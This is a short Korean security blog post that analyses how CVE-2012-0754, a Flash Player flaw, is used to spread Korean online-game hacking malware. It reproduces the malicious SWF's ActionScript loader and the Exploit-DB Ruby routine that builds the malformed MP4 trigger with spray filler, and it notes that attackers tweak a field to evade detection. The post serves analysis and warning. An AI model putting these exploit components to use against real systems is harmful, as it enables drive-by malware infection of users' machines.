국내에서 전파되는 온라인게임핵 악성코드 전파용 취약점이 또 하나가 새롭게 추가가 되었습니다.
CVE-2012-0754 : http://www.exploit-db.com/exploits/18572/
Exploit-DB 사이트에 올라오자 마자 바로 자기네들에 맞게 수정하여 전파하네요. 아래는 이번에 국내에서 발견된 해당 취약점과 관련된 SWF 파일 내부에 작성되어 있는 액션 스크립트 입니다.
이전에 발견된 CVE-2011-2140 취약점과 아주 유사하게 구성되어 있으며 취약점과 관련된 MP4 파일명도 CVE-2011-2140 취약점은 ea.jpg 그리고 이번에 나온 CVE-2012-0754 취약점은 ee.jpg 로 사용하고 있습니다.
CVE-2011-2140 취약점 관련 이전 글 : https://jjoon.net/page/2011/09/09/adobe-flash-player-cve-2011-2140-취약점-간단-분석/
package
{
public class Exploit extends flash.display.Sprite
{
public function Exploit()
{
Gondad = 'pdRyrW8PbLGWI6Pv';
greeting = new flash.text.TextField();
greeting.text = 'Loading...';
greeting.x = 100;
greeting.y = 100;
addChild(greeting);
MyVideo = new flash.media.Video();
addChild(MyVideo);
MyNC = new flash.net.NetConnection();
MyNC.connect(null);
MyNS = new flash.net.NetStream(MyNC);
MyVideo.attachNetStream(MyNS);
MyNS.play('ee.jpg');
}
public var MyNC:flash.net.NetConnection;
public var MyNS:flash.net.NetStream;
public var MyVideo:flash.media.Video;
private var greeting:flash.text.TextField;
internal var Gondad:* = "pdRyrW8PbLGWI6Pv";
}
}
Exploit-DB 사이트에 올라와 있는 취약점과 관련된 MP4 파일을 생성하는 코드는 아래와 같습니다.
def create_mp4(target)
mp4 = ""
mp4 << "\x00\x00\x00\x18"
mp4 << "ftypmp42"
mp4 << "\x00\x00\x00\x00"
mp4 << "mp42isom"
mp4 << "\x00\x00\x00\x0D"
mp4 << "cprt"
mp4 << "\x00\xFF\xFF\xFF"
mp4 << "\x00\x00\x00\x00"
mp4 << "\x0c\x0c\x0c\x0c" * 2586
return mp4
end
그리고 아래는 이번에 국내에서 발견된 관련 MP4 파일 입니다. "yqoo" 부분은 계속해서 변경시키며 진단을 우회하고자 노력하고 있는 것으로 보입니다.
또 많은 사용자가 감염이 되겠군요...... 🙁